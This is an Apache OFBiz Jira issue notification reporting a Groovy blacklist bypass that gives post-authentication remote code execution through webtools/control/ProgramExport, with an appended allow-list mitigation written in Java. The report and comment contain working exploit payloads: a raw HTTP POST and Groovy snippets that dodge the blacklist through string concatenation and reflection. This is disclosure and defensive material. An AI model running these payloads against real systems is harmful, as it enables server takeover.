[ https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490593#comment-17490593 ]

Y4er commented on OFBIZ-12571:
------------------------------

Simply adding a blacklist can't solve the fundamental problem. Judging from the 
current blacklist after the repair

[https://github.com/apache/ofbiz-framework/commit/f2cf262cf56df86612971bf4dac82795c1e3a512#diff-5d4b97fff9ee1d57e4c1d8274847e196ba5404f367afb3e39025f583a3e95e1aR252]


there are still many ways to RCE, for example:

{code:java}
// example 1
def strings = new ArrayList<String>();
strings.add("calc")
def instance = Class.forName("java.lang.Pr" + 
"ocessBuilder").getDeclaredConstructor(List.class).newInstance(strings)
def method = instance.getClass().getDeclaredMethod("start", null)
method.invoke(instance,null)  

// example 2
evaluate("Proces"+"sBuilder.newInstance(\"calc\").start()")
{code}
Given the flexibility of the Groovy language, we cannot fix this vulnerability 
just by string blacklisting, because there are always multiple unknown 
bypasses.

Perhaps the Groovy sandbox should be considered to handle this.

> groovy blacklist bypass cause post-auth RCE from 
> webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
>                 Key: OFBIZ-12571
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12571
>             Project: OFBiz
>          Issue Type: Bug
>          Components: framework/webtools
>    Affects Versions: 18.12.05
>         Environment: ofbiz 18.12.05
>            Reporter: Y4er
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.06, 22.01.01
>
>         Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from 
> webtools/control/ProgramExport
>  
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; 
> webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)
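As an added defender-side illustration (not OFBiz project code and not part of the comment above), the Java snippet below shows the allow-list approach the comment points toward: instead of matching strings in the submitted program, the Groovy compiler is configured with a `SecureASTCustomizer` that rejects method calls on any receiver type outside an explicit list, any class referenced outside an import allow-list, and closures and method definitions. Because the check runs on the resolved AST, it does not depend on how a class name is spelled or concatenated in the source. The class name, the receiver list and the sample scripts are assumptions made for the demonstration; the setter names are the Groovy 2.x/3.x ones (newer Groovy releases deprecate the `...Whitelist` setters in favour of `setAllowed...` equivalents).

```java
// Added illustration, not OFBiz code: compile user-supplied Groovy under an
// explicit allow-list (SecureASTCustomizer) rather than a string blacklist.
import groovy.lang.GroovyShell;
import org.codehaus.groovy.control.CompilationFailedException;
import org.codehaus.groovy.control.CompilerConfiguration;
import org.codehaus.groovy.control.customizers.SecureASTCustomizer;

import java.util.Arrays;
import java.util.Collections;
import java.util.List;

public class RestrictedGroovyGate {

    // Hypothetical allow-list for the demo: the only types a script may call
    // methods on. java.lang.Class, java.lang.System and friends are absent on purpose.
    private static final List<Class<?>> ALLOWED_RECEIVERS = Arrays.asList(
            String.class, Integer.class, Long.class, Double.class, Boolean.class,
            Math.class, java.util.List.class, java.util.Map.class);

    static CompilerConfiguration restrictedConfiguration() {
        SecureASTCustomizer secure = new SecureASTCustomizer();
        // An empty allow-list means "nothing is allowed"; null would mean "no check".
        secure.setImportsWhitelist(Collections.<String>emptyList());
        secure.setStarImportsWhitelist(Collections.<String>emptyList());
        secure.setStaticImportsWhitelist(Collections.<String>emptyList());
        secure.setStaticStarImportsWhitelist(Collections.<String>emptyList());
        // Also check classes used without an import statement (fully qualified
        // names, class expressions such as the receiver of Class.forName).
        secure.setIndirectImportCheckEnabled(true);
        // Method calls are only permitted on the listed receiver types.
        secure.setReceiversClassesWhiteList(ALLOWED_RECEIVERS);
        secure.setMethodDefinitionAllowed(false);
        secure.setClosuresAllowed(false);
        secure.setPackageAllowed(false);

        CompilerConfiguration config = new CompilerConfiguration();
        config.addCompilationCustomizers(secure);
        return config;
    }

    /** True if the script compiles under the allow-list, false if the customizer rejected it. */
    static boolean accepts(String script) {
        GroovyShell shell = new GroovyShell(RestrictedGroovyGate.class.getClassLoader(),
                                            restrictedConfiguration());
        try {
            shell.parse(script); // the customizer runs during compilation; nothing is executed
            return true;
        } catch (CompilationFailedException | SecurityException e) {
            // e.getMessage() carries the reason, e.g. which receiver or import was refused
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed sample inputs for the demonstration.
        System.out.println(accepts("def total = 1 + 2; 'sum=' + total"));        // accepted
        System.out.println(accepts("Class.forName('java.lang.String')"));        // rejected: receiver Class
        System.out.println(accepts("System.getProperty('user.home')"));          // rejected: receiver System
    }
}
```

The Groovy documentation describes `SecureASTCustomizer` as a compile-time check on the syntax tree, not a runtime sandbox: it does not observe what reflection or a nested `evaluate` call does once the script is running. It narrows the surface considerably compared with a string blacklist, but it has to be combined with the runtime controls the project settles on rather than used as the sole gate.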
